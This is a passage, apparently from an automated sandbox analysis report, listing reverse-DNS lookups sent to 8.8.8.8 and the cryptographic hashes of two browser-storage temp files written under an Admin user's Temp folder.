| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Local Storage\leveldb_7.temp\CURRENT.bak
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Temp\Session Storage_8.temp\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |